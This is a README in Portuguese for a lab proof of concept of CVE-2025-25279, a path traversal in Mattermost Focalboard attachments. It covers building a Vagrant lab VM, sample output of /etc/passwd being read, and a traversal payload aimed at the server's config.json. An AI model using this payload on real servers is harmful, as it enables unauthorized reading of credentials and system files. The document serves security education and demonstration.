
Prova de conceito de exploração para CVE-2025-25279, uma travessia de caminho no Mattermost Focalboard que permite leitura arbitrária de arquivos autenticada e exfiltração de arquivos sensíveis.
Esta prova de conceito demonstra a exploração da vulnerabilidade CVE-2025-25279 que afeta o Mattermost 10.4.1.
Uma falha no Focalboard (o módulo de gerenciamento de quadros) permite uma leitura arbitrária de arquivos através de um path traversal nos anexos.
O exploit permite exfiltrar:
/etc/passwd/etc/groupopt/mattermost/config/config.jsonO ataque funciona apenas com uma conta de usuário autenticada nos cenários vulneráveis.
O diretório target/ não está incluído (muito volumoso para GitHub).
Baixar manualmente: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz
Em seguida, coloque o arquivo em: target
Primeiro vá para o diretório target e execute:
cd target
make mattermost.box
Certifique-se de ter a box mattermost-poc, caso contrário a VM não funcionará:
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box
cd live/vm1
vagrant up
Conectar-se à VM
vagrant ssh
abrir: http://localhost:8065
Perfil --> Security --> Personal Access Tokens
A partir da máquina host:
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip
chmod +x exploit.sh
./exploit.sh
Será solicitado:
PAT (Personal Access Token) :
👉 Insira um PAT válido de um usuário Mattermost.
📸 Exemplo de saída (exfiltração de /etc/passwd)
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh
Arquivo alvo: config.json
Para mirar um arquivo sensível do Mattermost:
Modifique no início do script exploit.sh:
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
O exploit exibirá então o conteúdo do arquivo config.json.
🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril
🎬 Demonstração em vídeo
👉 Uma demonstração completa em vídeo encontra-se em: live/Démonstration/video-poc-cve-2025-25279.mp4
🧩 Notas
Este PoC é estritamente destinado a ambientes de aprendizado. Nunca use fora de contexto educacional ou sem autorização.